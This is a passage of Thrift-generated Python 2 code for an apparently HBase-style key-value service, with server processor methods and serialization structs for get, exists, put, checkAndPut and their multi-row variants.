    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("increment", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_openScanner(self, seqid, iprot, oprot):
    args = openScanner_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = openScanner_result()
    try:
      result.success = self._handler.openScanner(args.table, args.scan)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("openScanner", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_getScannerRows(self, seqid, iprot, oprot):
    args = getScannerRows_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = getScannerRows_result()
    try:
      result.success = self._handler.getScannerRows(args.scannerId, args.numRows)
    except TIOError as io:
      result.io = io
    except TIllegalArgument as ia:
      # scanner calls additionally declare TIllegalArgument
      result.ia = ia
    oprot.writeMessageBegin("getScannerRows", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_closeScanner(self, seqid, iprot, oprot):
    args = closeScanner_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = closeScanner_result()
    try:
      self._handler.closeScanner(args.scannerId)
    except TIOError as io:
      result.io = io
    except TIllegalArgument as ia:
      result.ia = ia
    oprot.writeMessageBegin("closeScanner", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class exists_args:
  """
  Wire struct carrying the arguments of the `exists` call.
  Attributes:
   - table: the table to check on
   - get: the TGet to check for
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
  )
  def __init__(self, table=None, get=None,):
    self.table = table
    self.get = get
  def read(self, iprot):
    # Fast path: decode in C via fastbinary when the accelerated binary
    # protocol and a compatible transport are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: generic field-by-field decode; unknown fields are skipped
    # for forward compatibility.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.get = TGet()
          self.get.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('exists_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.get is not None:
      oprot.writeFieldBegin('get', TType.STRUCT, 2)
      self.get.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Both fields are required by the IDL.
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.get is None:
      raise TProtocol.TProtocolException(message='Required field get is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class exists_result:
  """
  Wire struct carrying the reply of the `exists` call: either the bool
  `success` value or a TIOError in `io`.
  Attributes:
   - success
   - io
  """
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io
  def read(self, iprot):
    # Fast path via fastbinary when available; otherwise generic decode.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('exists_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Result fields are optional (exactly one is set by the server).
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_args:
  """
  Wire struct carrying the arguments of the `get` call.
  Attributes:
   - table: the table to get from
   - get: the TGet to fetch
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
  )
  def __init__(self, table=None, get=None,):
    self.table = table
    self.get = get
  def read(self, iprot):
    # Fast path via fastbinary when available; otherwise generic decode.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.get = TGet()
          self.get.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.get is not None:
      oprot.writeFieldBegin('get', TType.STRUCT, 2)
      self.get.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Both fields are required by the IDL.
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.get is None:
      raise TProtocol.TProtocolException(message='Required field get is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_result:
  """
  Wire struct carrying the reply of the `get` call: a TResult in
  `success` or a TIOError in `io`.
  Attributes:
   - success
   - io
  """
  thrift_spec = (
    (0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io
  def read(self, iprot):
    # Fast path via fastbinary when available; otherwise generic decode.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = TResult()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Result fields are optional (exactly one is set by the server).
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getMultiple_args:
  """
  Wire struct carrying the arguments of the `getMultiple` call.
  Attributes:
   - table: the table to get from
   - gets: a list of TGets to fetch, the Result list
  will have the Results at corresponding positions
  or null if there was an error
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.LIST, 'gets', (TType.STRUCT,(TGet, TGet.thrift_spec)), None, ), # 2
  )
  def __init__(self, table=None, gets=None,):
    self.table = table
    self.gets = gets
  def read(self, iprot):
    # Fast path via fastbinary when available; otherwise generic decode.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          # Decode list<TGet>; generated temp names (_etype45 etc.) kept as-is.
          self.gets = []
          (_etype45, _size42) = iprot.readListBegin()
          for _i46 in xrange(_size42):
            _elem47 = TGet()
            _elem47.read(iprot)
            self.gets.append(_elem47)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getMultiple_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.gets is not None:
      oprot.writeFieldBegin('gets', TType.LIST, 2)
      oprot.writeListBegin(TType.STRUCT, len(self.gets))
      for iter48 in self.gets:
        iter48.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Both fields are required by the IDL.
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.gets is None:
      raise TProtocol.TProtocolException(message='Required field gets is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getMultiple_result:
  """
  Wire struct carrying the reply of the `getMultiple` call: a list of
  TResult in `success` or a TIOError in `io`.
  Attributes:
   - success
   - io
  """
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io
  def read(self, iprot):
    # Fast path via fastbinary when available; otherwise generic decode.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Decode list<TResult>; generated temp names kept as-is.
          self.success = []
          (_etype52, _size49) = iprot.readListBegin()
          for _i53 in xrange(_size49):
            _elem54 = TResult()
            _elem54.read(iprot)
            self.success.append(_elem54)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getMultiple_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter55 in self.success:
        iter55.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Result fields are optional (exactly one is set by the server).
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class put_args:
  """Thrift argument struct for put.

  Attributes:
   - table: the table to put data in
   - put: the TPut to put
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 2
  )

  def __init__(self, table=None, put=None,):
    self.table = table
    self.put = put

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.put = TPut()
          self.put.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('put_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.put is not None:
      oprot.writeFieldBegin('put', TType.STRUCT, 2)
      self.put.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field ('table' or 'put') is unset."""
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.put is None:
      raise TProtocol.TProtocolException(message='Required field put is unset!')
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class put_result:
  """Thrift result struct for put (void call; only carries an optional error).

  Attributes:
   - io: TIOError raised by the server, if any
  """

  # Per-field wire metadata: (field id, type, name, type args, default).
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )

  def __init__(self, io=None,):
    self.io = io

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('put_result')
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Result structs have no required fields.
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class checkAndPut_args:
  """Thrift argument struct for checkAndPut.

  Attributes:
   - table: to check in and put to
   - row: row to check
   - family: column family to check
   - qualifier: column qualifier to check
   - value: the expected value, if not provided the
  check is for the non-existence of the
  column in question
   - put: the TPut to put if the check succeeds
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.STRING, 'row', None, None, ), # 2
    (3, TType.STRING, 'family', None, None, ), # 3
    (4, TType.STRING, 'qualifier', None, None, ), # 4
    (5, TType.STRING, 'value', None, None, ), # 5
    (6, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 6
  )

  def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, put=None,):
    self.table = table
    self.row = row
    self.family = family
    self.qualifier = qualifier
    self.value = value
    self.put = put

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.row = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.family = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.qualifier = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRING:
          self.value = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.STRUCT:
          self.put = TPut()
          self.put.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('checkAndPut_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.row is not None:
      oprot.writeFieldBegin('row', TType.STRING, 2)
      oprot.writeString(self.row)
      oprot.writeFieldEnd()
    if self.family is not None:
      oprot.writeFieldBegin('family', TType.STRING, 3)
      oprot.writeString(self.family)
      oprot.writeFieldEnd()
    if self.qualifier is not None:
      oprot.writeFieldBegin('qualifier', TType.STRING, 4)
      oprot.writeString(self.qualifier)
      oprot.writeFieldEnd()
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.STRING, 5)
      oprot.writeString(self.value)
      oprot.writeFieldEnd()
    if self.put is not None:
      oprot.writeFieldBegin('put', TType.STRUCT, 6)
      self.put.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field is unset.

    'value' is deliberately not checked: it is optional (absence means the
    check is for non-existence of the column).
    """
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.row is None:
      raise TProtocol.TProtocolException(message='Required field row is unset!')
    if self.family is None:
      raise TProtocol.TProtocolException(message='Required field family is unset!')
    if self.qualifier is None:
      raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
    if self.put is None:
      raise TProtocol.TProtocolException(message='Required field put is unset!')
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class checkAndPut_result:
  """Thrift result struct for checkAndPut.

  Attributes:
   - success: bool, whether the check passed and the put was applied
   - io: TIOError raised by the server, if any
  """

  # Per-field wire metadata: (field id, type, name, type args, default).
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, io=None,):
    self.success = success
    self.io = io

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.io = TIOError()
          self.io.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('checkAndPut_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.io is not None:
      oprot.writeFieldBegin('io', TType.STRUCT, 1)
      self.io.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Result structs have no required fields.
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class putMultiple_args:
  """Thrift argument struct for putMultiple.

  Attributes:
   - table: the table to put data in
   - puts: a list of TPuts to commit
  """

  # Per-field wire metadata: (field id, type, name, type args, default);
  # the tuple index corresponds to the Thrift field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'table', None, None, ), # 1
    (2, TType.LIST, 'puts', (TType.STRUCT,(TPut, TPut.thrift_spec)), None, ), # 2
  )

  def __init__(self, table=None, puts=None,):
    self.table = table
    self.puts = puts

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
    # Fast path: decode via the fastbinary C extension when possible.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.table = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          self.puts = []
          # Read _size56 TPut elements into self.puts.
          (_etype59, _size56) = iprot.readListBegin()
          for _i60 in xrange(_size56):
            _elem61 = TPut()
            _elem61.read(iprot)
            self.puts.append(_elem61)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; only fields that are set are written."""
    # Fast path: encode via the fastbinary C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('putMultiple_args')
    if self.table is not None:
      oprot.writeFieldBegin('table', TType.STRING, 1)
      oprot.writeString(self.table)
      oprot.writeFieldEnd()
    if self.puts is not None:
      oprot.writeFieldBegin('puts', TType.LIST, 2)
      oprot.writeListBegin(TType.STRUCT, len(self.puts))
      for iter62 in self.puts:
        iter62.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field ('table' or 'puts') is unset."""
    if self.table is None:
      raise TProtocol.TProtocolException(message='Required field table is unset!')
    if self.puts is None:
      raise TProtocol.TProtocolException(message='Required field puts is unset!')
    return

  def __repr__(self):
    # Debug representation listing every attribute (Python 2 iteritems).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    # Python 2 does not derive __ne__ from __eq__.
    return not (self == other)
class putMultiple_result:
  """Thrift result struct for putMultiple (void call; only carries an optional error).

  Attributes:
   - io: TIOError raised by the server, if any
  """

  # Per-field wire metadata: (field id, type, name, type args, default).
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
  )

  def __init__(self, io=None,):
    self.io = io

  def read(self, iprot):
    """Deserialize this struct from iprot; unrecognized fields are skipped."""
